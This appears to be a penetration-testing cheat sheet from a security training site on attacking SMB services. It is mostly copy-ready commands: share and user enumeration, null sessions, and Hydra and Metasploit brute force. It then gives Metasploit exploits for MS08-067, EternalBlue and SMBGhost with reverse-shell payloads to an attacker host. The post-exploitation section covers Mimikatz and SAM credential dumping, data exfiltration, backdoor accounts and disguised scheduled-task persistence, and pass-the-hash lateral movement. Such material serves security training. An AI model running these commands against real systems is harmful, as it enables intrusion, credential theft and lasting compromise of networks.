Skip to main content

Want to Practice These Techniques?

Try Hackviser's interactive cyber security upskilling platform - Learn by doing!

Start Practicing Now

SMB (Server Message Block)

Default Port: 139, 445

SMB (Server Message Block), also known as CIFS (Common Internet File System), is a network protocol that allows for file sharing, network browsing, printing services, and inter-process communication over a network.

The SMB protocol provides you with the ability to access resources from a server.

Connect

In order to initiate the process, it's imperative to establish a connection to the Server Message Block (SMB) server.

smbclient -L //target-ip

Recon

Service Detection with Nmap

Use Nmap to detect SMB services and identify server capabilities.

nmap -p 139,445 target.com

Connect to SMB services to gather version and service information.

# Nmap to discover SMB services
nmap -p 445 --open -sV target.com

# Nmap script for SMB version
nmap --script smb-protocols -p 445 target.com

Enumeration

Use various tools for detailed SMB enumeration and information gathering.

Share Enumeration

Discover and enumerate SMB shares on target systems.

Using smbclient

# List shares anonymously
smbclient -L //target.com -U anonymous

# List shares with credentials
smbclient -L //target.com -U username%password

# Connect to specific share
smbclient //target.com/sharename -U username%password

Using smbmap

# Basic share enumeration
smbmap -H target.com

# With credentials
smbmap -H target.com -u username -p password

# Recursive enumeration
smbmap -H target.com -u username -p password -r

User and Group Enumeration

Enumerate users, groups, and domain information from SMB services.

Using enum4linux

# Full enumeration
enum4linux -a target.com

# User enumeration only
enum4linux -U target.com

# Group enumeration only
enum4linux -G target.com

# Password policy
enum4linux -P target.com

Using nmap

# Enumerate shares and users
nmap -p 445 --script=smb-enum-shares,smb-enum-users target.com

# Enumerate groups and domains
nmap -p 445 --script=smb-enum-groups,smb-enum-domains target.com

# Security settings
nmap -p 445 --script=smb-security-mode target.com

Attack Vectors

Exploit various SMB vulnerabilities and misconfigurations for unauthorized access.

SMB Null Session

A Null Session refers to an unauthenticated connection to an SMB server, providing the capability to gather significant information. Exploitation typically involves SMB connections over TCP ports 445 and 139.

# Using rpcclient
rpcclient -U "" target.com

# Using smbclient
smbclient -L //target.com -N

# Using smbmap
smbmap -H target.com -u "" -p ""

SMB Signing

SMB signing, if not enabled, can be exploited, potentially allowing an attacker to conduct a man-in-the-middle attack.

# Check SMB signing status
nmap --script smb-security-mode.nse -p445 target.com

# Using smbclient
smbclient -L //target.com -U username%password --option='client signing=off'

Brute Force Attack

Brute force SMB credentials using various tools and techniques.

Using Hydra

# Brute force SMB credentials
hydra -l administrator -P passwords.txt smb://target.com

# With username list
hydra -L users.txt -P passwords.txt smb://target.com

Using Nmap

# SMB brute force
nmap -p 445 --script smb-brute target.com

# With custom credentials
nmap -p 445 --script smb-brute --script-args userdb=users.txt,passdb=passwords.txt target.com

Using Metasploit

use auxiliary/scanner/smb/smb_login
set RHOSTS target.com
set USER_FILE /path/to/users.txt
set PASS_FILE /path/to/passwords.txt
set STOP_ON_SUCCESS true
exploit

CVE Exploitation

Exploit known SMB vulnerabilities for remote code execution.

MS08-067 (Netapi)

use exploit/windows/smb/ms08_067_netapi
set RHOSTS target.com
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker-ip
exploit

MS17-010 (EternalBlue)

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target.com
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker-ip
exploit

SMBGhost (CVE-2020-0796)

use exploit/windows/smb/cve_2020_0796_smbghost
set RHOSTS target.com
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker-ip
exploit

Post-Exploitation

Extract sensitive data and establish persistent access after successful SMB exploitation.

Credential Harvesting

Extract credentials and authentication data from compromised SMB systems.

Hash Dumping

# Using Metasploit
use post/windows/gather/smart_hashdump
exploit

# Using Mimikatz (if you have access)
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

# Using secretsdump
secretsdump.py domain/user:password@target.com

SAM Database Extraction

# Using Metasploit
use post/windows/gather/sam_hashdump
exploit

# Manual extraction
reg save HKLM\SAM C:\Windows\Temp\sam
reg save HKLM\SYSTEM C:\Windows\Temp\system

Privilege Escalation

Escalate privileges on compromised SMB systems.

# Using Meterpreter
getsystem

# Using Mimikatz
mimikatz.exe
privilege::debug
token::elevate

# Using PSExec
psexec.exe -s cmd.exe

Data Exfiltration

Extract sensitive data from SMB shares and compromised systems.

Share Access

# Using smbclient
smbclient //target.com/sharename -U username%password
> get sensitive_file.txt
> mget *.txt

# Using smbget
smbget -R smb://target.com/sharename/ -U username%password

# Using smbmap
smbmap -H target.com -u username -p password -d . -R sharename
# Using smbclient
smbclient //target.com/sharename -U username%password
> ls
> cd sensitive_folder
> get *.pdf
> get *.docx

Persistence

Create persistent backdoor access to compromised SMB systems.

# Create backdoor user
net user backdoor P@ssw0rd123! /add
net localgroup administrators backdoor /add

# Registry persistence
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"

# Scheduled task
schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\backdoor.exe" /sc onlogon /ru SYSTEM

Lateral Movement

Use compromised SMB access for lateral movement across the network.

# SMB to other machines
smbclient //another-host.com/sharename -U username%password

# Pass-the-Hash
pth-winexe -U domain/username%hash //another-host.com cmd

# WMI lateral movement
wmic /node:another-host.com /user:username /password:password process call create "cmd.exe"

Common SMB Commands

CommandDescriptionUsage
smbclientConnect to an SMB/CIFS serversmbclient //server/share
smbgetDownload files from an SMB/CIFS serversmbget smb://server/share/file
smbpasswdChange a user's SMB passwordsmbpasswd -r server -U username
smbstatusDisplay information about SMB connectionssmbstatus
smbtreeList SMB/CIFS shares on a networksmbtree
mount -t cifsMount an SMB/CIFS sharemount -t cifs //server/share /mnt/point
umountUnmount an SMB/CIFS shareumount /mnt/point